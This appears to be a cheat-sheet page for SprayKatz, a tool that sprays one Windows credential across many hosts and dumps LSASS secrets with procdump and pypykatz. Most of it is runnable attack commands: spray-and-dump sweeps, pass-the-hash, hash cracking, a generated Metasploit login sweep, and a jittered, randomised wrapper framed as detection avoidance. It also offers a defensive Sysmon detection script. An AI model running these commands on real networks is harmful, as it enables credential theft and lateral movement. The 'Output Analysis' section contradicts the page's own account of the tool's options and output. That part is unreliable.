SprayKatz
Overview
SprayKatz is a Python tool that sprays one set of valid credentials across many Windows hosts and, wherever that credential grants local administrator rights, dumps the secrets held by the LSASS process. It pushes procdump (Sysinternals) to the target, runs it remotely to write a memory dump of lsass.exe, and parses that dump with pypykatz by reading it over SMB rather than copying the whole file back, so no Mimikatz ever runs on the target and the dump does not have to land on the attacker's disk. It does not guess passwords against user lists: it reuses a credential you already hold, which makes it a post-compromise tool for authorized penetration tests.
The tool is most useful once a single local-administrator or domain credential is in hand, because every host where that credential works yields the logon secrets of everyone else logged on there, and those secrets are what drive lateral movement across the network.
Prerequisites
- Python 3 (the project is developed and tested on Linux)
- Network reachability to the targets on TCP 445 (SMB) and on the ports used by the remote execution method (TCP 135 plus dynamic RPC ports for WMI)
- procdump.exe, the Sysinternals tool that SprayKatz pushes to and runs on each target; the repository bundles a copy, and it never executes on the attacker machine
- pypykatz and impacket, installed from the project's requirements.txt
- One valid credential (domain or local) to spray
- That credential must be a local administrator on the targets: dumping LSASS requires SeDebugPrivilege, which procdump can only obtain from an elevated context
Installation
Linux/macOS
# Clone repository (the project README clones with --recurse-submodules)
git clone --recurse-submodules https://github.com/aas-n/spraykatz.git
cd spraykatz
# Create virtual environment
python3 -m venv venv
source venv/bin/activate
# Install dependencies (impacket, pypykatz and the rest come from requirements.txt)
pip install -r requirements.txt
# procdump.exe is bundled with the repository and is executed on the Windows target, not
# locally, so Wine is not needed. To refresh it, fetch the current Sysinternals build:
wget https://download.sysinternals.com/files/Procdump.zip
unzip Procdump.zip procdump.exe
# Test installation
python3 spraykatz.py -h
Windows
# SprayKatz is developed on Linux; the equivalent setup on Windows is:
git clone --recurse-submodules https://github.com/aas-n/spraykatz.git
cd spraykatz
# Create virtual environment
python -m venv venv
.\venv\Scripts\Activate.ps1
# Install dependencies (pypykatz is included in requirements.txt)
pip install -r requirements.txt
# Optional: refresh the bundled procdump.exe from Sysinternals
$ProgressPreference = 'SilentlyContinue'
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "procdump.zip"
Expand-Archive procdump.zip -DestinationPath .
# Verify installation
python spraykatz.py -h
Docker Installation
If you package SprayKatz in a container (a python:3 base plus the clone and pip install above is enough), run it like any other CLI image and mount a directory for the logs you want to keep:
# Build Docker image from your Dockerfile
docker build -t spraykatz .
# Run container
docker run -it --rm spraykatz -h
# Volume mount for logs and retrieved dumps
docker run -it --rm -v /path/results:/results spraykatz -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.0/24
Basic Usage
Simple Credential Spray
SprayKatz takes exactly one credential (-d/-u/-p) and tries it against every target; hosts where it authenticates as an administrator are dumped in the same run.
# Spray one domain credential across a /24 and dump LSASS wherever it is admin
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.0/24
# Single target
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.100
# Local account instead of a domain account: pass the host's own NetBIOS name as the domain
python3 spraykatz.py -d WS01 -u localadmin -p 'Passw0rd!' -t 192.168.1.100
Credential Dumping
Dumping is not a separate mode: on every target the credential can administer, procdump is pushed and executed and the resulting LSASS dump is parsed on the fly.
# Dump and leave procdump and the dump file in place on the target (default)
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.100
# Dump, then remove procdump and the dump file from the target (-r)
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.100 -r
# Raise the connection timeout (seconds) on slow links
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.100 -to 30
Common Commands
| Command | Description |
|---|---|
| spraykatz.py -d DOMAIN -u USER -p PASS -t TARGET | Spray one credential and dump LSASS where it is admin |
| spraykatz.py ... -t 192.168.1.0/24 | Target a CIDR range |
| spraykatz.py ... -t 192.168.1.10,192.168.1.20 | Target a comma-separated list of hosts or ranges |
| spraykatz.py ... -t targets.txt | Read targets from a file |
| spraykatz.py ... -r | Remove procdump and the dump from each target afterwards |
| spraykatz.py ... -to 30 | Connection/execution timeout in seconds |
| spraykatz.py ... -v / -vv | Verbose / debug output |
| spraykatz.py -h | Usage and the full option list of the installed version |
Advanced Spray Techniques
Multi-Target Spraying
# CIDR range
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.0/24
# Specific hosts and ranges, comma separated
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' \
    -t 192.168.1.100,192.168.1.101,192.168.2.0/24
# Host list from a file (one target per line)
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t hosts.txt
SprayKatz has no thread-count option: it works through the target list one host after another, which is slow on large ranges but keeps the load on any single host to one logon and one procdump run.
Credential List Attacks
SprayKatz accepts a single username and password per run. To try several credential pairs, loop over a file from the shell and let each run cover the whole range:
# credentials.txt holds one "domain:user:password" per line
while IFS=: read -r dom usr pw; do
    python3 spraykatz.py -d "$dom" -u "$usr" -p "$pw" -t 192.168.1.0/24 -r
done < credentials.txt
Do not turn this into a user-list spray against domain accounts without checking the lockout policy first: every target is a real network logon and each failure counts against the account.
Credential Extraction
Everything pypykatz can parse out of the LSASS dump is reported in one pass: NT hashes from the MSV package, plaintext passwords from WDigest, SSP/TsPkg and Kerberos where the host still keeps them, Kerberos tickets and DPAPI keys. There are no per-package switches.
# Dump and parse in one run, cleaning up afterwards
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.100 -r
# Keep the dump on the target (omit -r), pull it back over SMB (smbclient, for instance) and parse it offline
pypykatz lsa minidump lsass_192.168.1.100.dmp
# Machine-readable output for tooling
pypykatz lsa minidump lsass_192.168.1.100.dmp --json -o lsass_192.168.1.100.json
Memory Dumping Techniques
LSASS Dumping
Procdump is the only dumper SprayKatz drives; there is no rundll32/comsvcs.dll or other alternative built in. It pushes procdump.exe to the target, executes it with the admin credential, has it write a full memory dump of lsass.exe, then parses that file over SMB.
# Dump LSASS on a host and parse it remotely
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.100
# Same, with debug output showing each step (connection, upload, execution, parsing)
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.100 -vv
# procdump is signed Sysinternals software, but EDR still flags any handle to lsass.exe opened with
# PROCESS_VM_READ; expect a Sysmon Event ID 10 or a Defender ASR block on monitored hosts.
Process Dumping
SprayKatz dumps lsass.exe only. To parse a dump you already have (from SprayKatz, procdump, Task Manager or comsvcs.dll), use pypykatz directly, from the CLI or from Python:
pypykatz lsa minidump lsass.dmp
python3 -c "from pypykatz.pypykatz import pypykatz; print(pypykatz.parse_minidump_file('lsass.dmp'))"
Registry Dumping
SAM, SYSTEM and SECURITY hives are outside SprayKatz's scope; it has no registry or SAM options. With the same administrator credential, impacket's secretsdump.py retrieves that material (local account hashes, cached domain logons, LSA secrets) remotely:
secretsdump.py 'example.com/admin:Passw0rd!@192.168.1.100'
Configuration
Configuration File
SprayKatz reads no configuration file and no environment variables; everything is set per invocation, and the tunables are the timeout (-to), cleanup (-r) and verbosity (-v/-vv). For repeatable engagements, keep the fixed parameters in a small wrapper script instead:
cat > run_spraykatz.sh << 'EOF'
#!/usr/bin/env bash
# Fixed engagement parameters; the target spec is the only argument
SK_DOMAIN="example.com"
SK_USER="admin"
SK_TIMEOUT=20
read -rs -p "Password for $SK_DOMAIN\\$SK_USER: " SK_PASSWORD; echo
exec python3 spraykatz.py -d "$SK_DOMAIN" -u "$SK_USER" -p "$SK_PASSWORD" -t "$1" -to "$SK_TIMEOUT" -r -v
EOF
chmod +x run_spraykatz.sh
./run_spraykatz.sh 192.168.1.0/24
Environment Variables
Exporting the password in a variable keeps it out of your shell history, but because SprayKatz takes it as a command-line argument it is still visible in the attacker host's process list for the duration of each run:
export SK_PASSWORD='Passw0rd!'
python3 spraykatz.py -d example.com -u admin -p "$SK_PASSWORD" -t 192.168.1.0/24
Output Analysis
Section titled “Output Analysis”Result Formats
Section titled “Result Formats”# JSON output (recommended for parsing)
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--output results.json \
--output-format json
# CSV output
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--output results.csv \
--output-format csv
# Text output
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--output results.txt
Parsing Results
Section titled “Parsing Results”# Extract successful spray attempts
cat results.json | jq '.successful_sprays[]'
# Get credential pairs
cat results.json | jq -r '.credentials[] | "\(.username):\(.password)"'
# List targets where credentials work
cat results.json | jq -r '.successful_sprays[].target_ip' | sort -u
# Count successes by user
cat results.json | jq -r '.successful_sprays[].username' | sort | uniq -c
Hash Analysis
Section titled “Hash Analysis”# Extract NTLM hashes
cat results.json | jq -r '.ntlm_hashes[]' > hashes.txt
# Extract plaintext credentials
cat results.json | jq -r '.plaintext_credentials[]'
# Identify weak credentials
python3 << 'EOF'
import json
with open('results.json') as f:
data = json.load(f)
for cred in data['credentials']:
if len(cred['password']) < 8:
print(f"Weak password: {cred['username']}:{cred['password']}")
EOF
Integrated Spray and Dump Workflow
Combined Attack
A single run already is the combined attack: the spray and the dump happen in one pass over the target list.
# Spray and dump across the range, cleaning up and keeping a transcript
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.0/24 -r -to 20 -v 2>&1 | tee comprehensive_results.log
Staged Approach
When you want to know where the credential works before touching LSASS anywhere, check admin access first with a tool that only authenticates (NetExec marks admin access with "Pwn3d!") and feed only those hosts to SprayKatz:
# Phase 1: find hosts where the credential is local admin, without dumping anything
nxc smb 192.168.1.0/24 -d example.com -u admin -p 'Passw0rd!' | grep 'Pwn3d!' | awk '{print $2}' | sort -u > successful_targets.txt
# Phase 2: dump only those hosts, one at a time, one log per host
while read -r target; do
    python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t "$target" -r -v 2>&1 | tee "dump_${target}.log"
done < successful_targets.txt
# Phase 3: merge the per-host transcripts into one record for the report
cat dump_*.log > all_dumped_credentials.log
Post-Compromise Lateral Movement
# Dump the host you already control with the credential you already hold
python3 spraykatz.py -d example.com -u compromised_user -p 'found_password' -t 192.168.1.100 -r -v 2>&1 | tee lateral_192.168.1.100.log
# Pick the domain accounts (DOMAIN\user) out of the findings, as opposed to local ones
grep -i 'EXAMPLE\\' lateral_192.168.1.100.log | sort -u
# Each newly recovered domain credential is a new run
python3 spraykatz.py -d example.com -u svc_backup -p 'RecoveredPassword' -t 192.168.1.0/24 -r
# NT hash but no plaintext: SprayKatz authenticates with a password, so make that hop with pass-the-hash via impacket
wmiexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c 'example.com/svc_backup@192.168.1.101'
Integration with Other Tools
Hashcat Integration
# Export NT hashes in user:hash form from retained dumps parsed with pypykatz --json
jq -r '.[].logon_sessions[].msv_creds[] | select(.NThash != null) | "\(.domainname)\\\(.username):\(.NThash)"' lsass_*.json | sort -u > hashes.txt
# Crack NT hashes (-m 1000); --username makes hashcat skip the user prefix
hashcat -m 1000 -a 0 --username hashes.txt rockyou.txt -o cracked.txt
# user:hash:password for the report
hashcat -m 1000 --username --show hashes.txt
# Only the recovered plaintexts
awk -F: '{print $NF}' cracked.txt | sort -u
Metasploit Integration
# Build a resource script: one smb_login sweep per recovered domain account with a plaintext
python3 > spray.rc << 'EOF'
import glob, json
seen = set()
for path in glob.glob("lsass_*.json"):
    for dump in json.load(open(path)).values():
        for sess in dump.get("logon_sessions", {}).values():
            for cred in sess.get("wdigest_creds", []) + sess.get("kerberos_creds", []):
                key = (cred.get("domainname"), cred.get("username"))
                if cred.get("password") and key not in seen:
                    seen.add(key)
                    print("use auxiliary/scanner/smb/smb_login")
                    print("set RHOSTS 192.168.1.0/24")
                    print(f"set SMBDomain {cred['domainname']}")
                    print(f"set SMBUser {cred['username']}")
                    print(f"set SMBPass {cred['password']}")
                    print("run")
EOF
# Run the generated script
msfconsole -q -r spray.rc
BloodHound Integration
SprayKatz has no BloodHound export; what it gives you is credentials, and the way to use them with BloodHound is to collect as one of the recovered domain accounts and then look those accounts up in the graph:
# Collect with a recovered domain credential (bloodhound-python, pointing -ns at a DC for name resolution)
bloodhound-python -d example.com -u svc_backup -p 'RecoveredPassword' -ns 192.168.1.10 -c All --zip
# Import the zip into BloodHound, mark every dumped account as owned, then query shortest paths from owned principals
Safety and Stealth
Detection Avoidance
SprayKatz has no delay, jitter, ordering, dry-run or rate options: every target gets one logon and, if it succeeds, one procdump execution, in list order. Pacing therefore happens outside the tool, by splitting the range and sleeping between invocations.
# Spread a range out over time: one host per run, random order, a pause between runs
for host in $(nmap -sL -n 192.168.1.0/24 | awk '/Nmap scan report/{print $NF}' | shuf); do
    python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t "$host" -r
    sleep $((10 + RANDOM % 10))
done
# What pacing cannot hide: the network logon itself (4624/4672 on the host, 4776 or 4768 on the DC),
# the write of procdump.exe, the process start from the remote-exec service, and the lsass.exe handle
# (Sysmon Event ID 10). Assume the Blue Team sees those and plan the window accordingly.
# There is no dry run; to test the credential without dumping anything, use a tool that only authenticates
nxc smb 192.168.1.0/24 -d example.com -u admin -p 'Passw0rd!'
Logging and Documentation
# Full transcript with timestamps (ts comes from moreutils; drop it if not installed)
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.0/24 -vv 2>&1 | ts '%Y-%m-%dT%H:%M:%S' | tee spraykatz.log
# One log per phase when running host lists in stages
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t dc_hosts.txt -r -v 2>&1 | tee dump_dcs.log
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t workstation_hosts.txt -r -v 2>&1 | tee dump_workstations.log
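The staged, paced and logged runs above are three views of one orchestration problem, so here is one wrapper that does all of it: expands the target spec, randomizes the order, attaches a jittered pause to each host, runs SprayKatz once per host, and writes a redacted, timestamped log. It is an added example for this page, not part of SprayKatz; it assumes only the documented arguments (-d, -u, -p, -t, -to, -r, -v) and the script name `spraykatz.py` in the current directory. `execute=False` gives you the dry run the tool itself lacks.

```python
"""Pace a SprayKatz campaign from outside the tool.

Added example for this page, not part of SprayKatz. It assumes SprayKatz's documented
arguments (-d, -u, -p, -t, -to, -r, -v) and nothing else; delay, jitter and ordering
live here because the tool has none.
"""
import ipaddress
import random
import shlex
import subprocess
import time


def expand_targets(spec):
    """'10.0.0.0/30,10.0.1.5' -> unique host strings; CIDR network/broadcast addresses excluded."""
    hosts = []
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if "/" in item:
            hosts.extend(str(h) for h in ipaddress.ip_network(item, strict=False).hosts())
        else:
            hosts.append(str(ipaddress.ip_address(item)))
    return list(dict.fromkeys(hosts))  # dedupe, keep first-seen order


def schedule(hosts, base_delay, jitter, rng):
    """Shuffle the hosts and attach a pause in [base_delay, base_delay + jitter] to each."""
    order = list(hosts)
    rng.shuffle(order)
    return [(host, base_delay + rng.uniform(0, jitter)) for host in order]


def spraykatz_argv(domain, user, password, host, timeout=20, remove=True, verbosity=1):
    """Command line for one host; -r removes procdump and the dump from the target afterwards."""
    argv = ["python3", "spraykatz.py", "-d", domain, "-u", user, "-p", password,
            "-t", host, "-to", str(timeout)]
    if remove:
        argv.append("-r")
    if verbosity:
        argv.append("-" + "v" * verbosity)
    return argv


def redact(argv):
    """Copy of argv with the value after -p replaced, for logging."""
    out = list(argv)
    if "-p" in out:
        out[out.index("-p") + 1] = "<redacted>"
    return out


def run_campaign(domain, user, password, targets, base_delay=10.0, jitter=5.0,
                 seed=None, log_path=None, execute=True):
    """One SprayKatz run per host in random order with jittered pauses; one record per host.

    execute=False builds the schedule and command lines without running anything,
    which is the dry run SprayKatz itself does not offer.
    """
    rng = random.Random(seed)
    records = []
    log = open(log_path, "a") if log_path else None
    try:
        for host, pause in schedule(expand_targets(targets), base_delay, jitter, rng):
            argv = spraykatz_argv(domain, user, password, host)
            stamp = time.strftime("%Y-%m-%dT%H:%M:%S%z")
            if log:
                log.write(f"{stamp} START {host} pause={pause:.1f}s {shlex.join(redact(argv))}\n")
            rc = None
            if execute:
                proc = subprocess.run(argv, capture_output=True, text=True)
                rc = proc.returncode
                if log:
                    log.write(proc.stdout)
                    log.write(f"{time.strftime('%Y-%m-%dT%H:%M:%S%z')} END {host} rc={rc}\n")
                time.sleep(pause)
            records.append({"host": host, "pause": round(pause, 1), "argv": argv, "rc": rc})
    finally:
        if log:
            log.close()
    return records


if __name__ == "__main__":
    # Dry run over a small constructed range so the schedule is readable
    for rec in run_campaign("example.com", "admin", "Passw0rd!", "192.168.1.0/30,192.168.1.100",
                            base_delay=10, jitter=5, seed=42, execute=False):
        print(rec["host"], rec["pause"], shlex.join(redact(rec["argv"])))
```

The password still reaches SprayKatz on its command line (the tool offers no other way), so it is visible in the attacker host's process list while each run lasts; the log, which tends to end up in the report archive, never records it. Pass `seed` when you want the same order reproduced for a re-test.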
Troubleshooting
Common Issues
# Authenticates but nothing is dumped: the credential is not a local admin on that host.
# SprayKatz needs write access to ADMIN$ and remote execution; confirm admin rights first
nxc smb 192.168.1.100 -d example.com -u admin -p 'Passw0rd!'    # look for (Pwn3d!)
# Timeouts on slow or filtered networks: raise -to and run a single host with debug output
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.100 -to 60 -vv
# procdump blocked or killed (Defender ASR "Block credential stealing from LSASS", EDR): the dump is empty or missing.
# SprayKatz has no alternative dumper; record the control as a finding instead of improvising a bypass mid-engagement.
# pypykatz parse errors on a retrieved dump: make sure it is a full dump (procdump -ma) and upgrade pypykatz
pip install --upgrade pypykatz
pypykatz lsa minidump lsass_192.168.1.100.dmp
Debugging
# Maximum verbosity against one host
python3 spraykatz.py -d example.com -u admin -p 'Passw0rd!' -t 192.168.1.100 -vv
# Check that the target's SMB and RPC endpoints are reachable at all
nc -zv 192.168.1.100 445 135
# procdump.exe runs only on the target; sanity-check the bundled binary locally by inspecting it, not running it
file procdump.exe
Best Practices
- Authorization: Obtain written approval that explicitly covers credential dumping, not just password testing, before any run
- Coordination: Tell the Blue Team what to expect (remote logons, procdump writes, lsass.exe handle opens) so detections are validated rather than tripped blind
- Lockout policy: Check the domain lockout threshold before spraying a domain account; every target is a real logon and each failure counts against it
- Pacing: Split large ranges and pause between runs; SprayKatz itself has no rate control
- Documentation: Record every target, timestamp and outcome, and which credentials were recovered where
- Clean Up: Run with -r so procdump.exe and the dump are removed from targets, and verify the removal; never clear event logs, they are the client's evidence, clearing them (Event ID 1102) is itself an indicator, and it is almost always out of scope
- Handling: Treat recovered hashes and plaintexts as client secrets: encrypt them at rest, share them only through the agreed channel, destroy them at engagement end
- Analysis: Correlate findings with other assessment tools
- Reporting: Include credential findings with risk ratings, in particular password reuse between local and domain accounts
- Time Windows: Dump during pre-coordinated periods; an LSASS dump on a production host is a visible event that can trigger an incident response
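Coordinating with the Blue Team is easier when both sides agree on what the run should look like in telemetry. The detection below is an added example for this page (not part of SprayKatz) written from the defender's side: it scores Sysmon-style events per host and raises a high-severity alert only when the lsass.exe handle open is corroborated by a procdump command line, a remote-execution parent or a `.dmp` file write. The event records are constructed in the shape of Sysmon Event IDs 1, 10 and 11 as an agent would forward them; the field names (`SourceImage`, `GrantedAccess`, `TargetFilename`) are Sysmon's, their casing in your pipeline may differ.

```python
"""Spot a SprayKatz-style LSASS dump in Sysmon telemetry.

Added example for this page, for the Blue-Team side of the coordination above; it is
not part of SprayKatz. Events are constructed JSON records in the shape of Sysmon
Event ID 1 (ProcessCreate), 10 (ProcessAccess) and 11 (FileCreate).
"""
import json
import re
from collections import defaultdict

PROCESS_VM_READ = 0x0010           # enough to read LSASS memory; 0x1FFFFF is PROCESS_ALL_ACCESS
ALLOWLISTED_LSASS_READERS = (      # known benign readers, matched on image basename
    "msmpeng.exe", "csrss.exe", "wininit.exe", "lsaiso.exe",
)
REMOTE_EXEC_PARENTS = ("wmiprvse.exe", "services.exe", "psexesvc.exe")
DUMP_CMDLINE = re.compile(r"(procdump|-ma\b).*lsass", re.IGNORECASE)

SAMPLE_EVENTS = [  # constructed: one SprayKatz-like chain on WS01, benign noise elsewhere
    {"host": "WS01", "EventID": 1, "Image": "C:\\Windows\\Temp\\procdump.exe",
     "CommandLine": "procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass.dmp",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "User": "EXAMPLE\\admin"},
    {"host": "WS01", "EventID": 10, "SourceImage": "C:\\Windows\\Temp\\procdump.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"host": "WS01", "EventID": 11, "Image": "C:\\Windows\\Temp\\procdump.exe",
     "TargetFilename": "C:\\Windows\\Temp\\lsass.dmp"},
    {"host": "WS02", "EventID": 10,
     "SourceImage": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18\\MsMpEng.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"host": "WS03", "EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "User": "EXAMPLE\\jane"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def indicators(event):
    """Names of the indicators one event triggers (empty for benign events)."""
    hits = []
    eid = event.get("EventID")
    if eid == 10 and basename(event.get("TargetImage", "")) == "lsass.exe":
        mask = int(event.get("GrantedAccess", "0x0"), 16)
        source = basename(event.get("SourceImage", ""))
        if mask & PROCESS_VM_READ and source not in ALLOWLISTED_LSASS_READERS:
            hits.append("lsass_handle_vm_read")
    elif eid == 1:
        if DUMP_CMDLINE.search(event.get("CommandLine", "")):
            hits.append("procdump_lsass_cmdline")
        if basename(event.get("ParentImage", "")) in REMOTE_EXEC_PARENTS:
            hits.append("spawned_by_remote_exec")
    elif eid == 11 and event.get("TargetFilename", "").lower().endswith(".dmp"):
        hits.append("dump_file_written")
    return hits


def detect(events):
    """Correlate per host: the lsass handle plus any second indicator is high; handle or
    procdump command line alone is medium; anything else is ignored."""
    per_host = defaultdict(list)
    for ev in events:
        for name in indicators(ev):
            per_host[ev["host"]].append(name)
    alerts = {}
    for host, names in per_host.items():
        unique = sorted(set(names))
        if "lsass_handle_vm_read" in unique and len(unique) > 1:
            severity = "high"
        elif "lsass_handle_vm_read" in unique or "procdump_lsass_cmdline" in unique:
            severity = "medium"
        else:
            continue
        alerts[host] = {"severity": severity, "indicators": unique}
    return alerts


if __name__ == "__main__":
    print(json.dumps(detect(SAMPLE_EVENTS), indent=2))
```

The allowlist is what keeps this usable: Defender and other legitimate readers open lsass.exe with `PROCESS_VM_READ` constantly, so a rule on the access mask alone is noise; the value comes from corroboration with the command line, the parent process (WmiPrvSE.exe or services.exe point at impacket-style remote execution) and the dump file. When the engagement is coordinated, the Blue Team can check that exactly this chain fired for the hosts and time window you report.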
Practical Assessment Scenarios
Initial Access Assessment
SprayKatz is not the tool for guessing passwords against user lists; it assumes one working credential. Run the guessing phase with a dedicated sprayer, within the lockout policy, and hand the first admin credential it finds to SprayKatz:
# Guessing phase (NetExec shown; one password across a user list), then one SprayKatz run with the credential that worked
nxc smb 192.168.1.0/24 -d example.com -u discovered_users.txt -p 'Welcome2024' --continue-on-success
python3 spraykatz.py -d example.com -u admin -p 'Welcome2024' -t 192.168.1.0/24 -r 2>&1 | tee initial_access.log
Post-Compromise Credential Discovery
# After gaining local admin on one host: dump it, then sweep the subnet with the same local credential
python3 spraykatz.py -d WS01 -u local_admin -p 'found_password' -t 192.168.1.100 -r 2>&1 | tee post_comp_ws01.log
python3 spraykatz.py -d WS01 -u local_admin -p 'found_password' -t 192.168.1.0/24 -r 2>&1 | tee post_comp_sweep.log
# Local account hashes, cached domain logons and LSA secrets live in the registry, not in LSASS; get them with secretsdump
secretsdump.py 'WS01/local_admin:found_password@192.168.1.100'
Resources
- GitHub: https://github.com/aas-n/SprayKatz
- pypykatz: https://github.com/skelsec/pypykatz
- Procdump: https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
- Mimikatz: https://github.com/gentilkiwi/mimikatz
Summary
SprayKatz turns one administrator credential into the logon secrets of every host it can reach, by spraying the credential across a range and dumping LSASS with procdump and pypykatz wherever it works. It has no rate control, no alternative dumpers and no structured output, so pacing, cleanup verification and result handling are the operator's job. Written authorization that covers credential dumping, coordination with the Blue Team on what the run will look like, and careful handling of the recovered secrets are what make its use defensible during an assessment.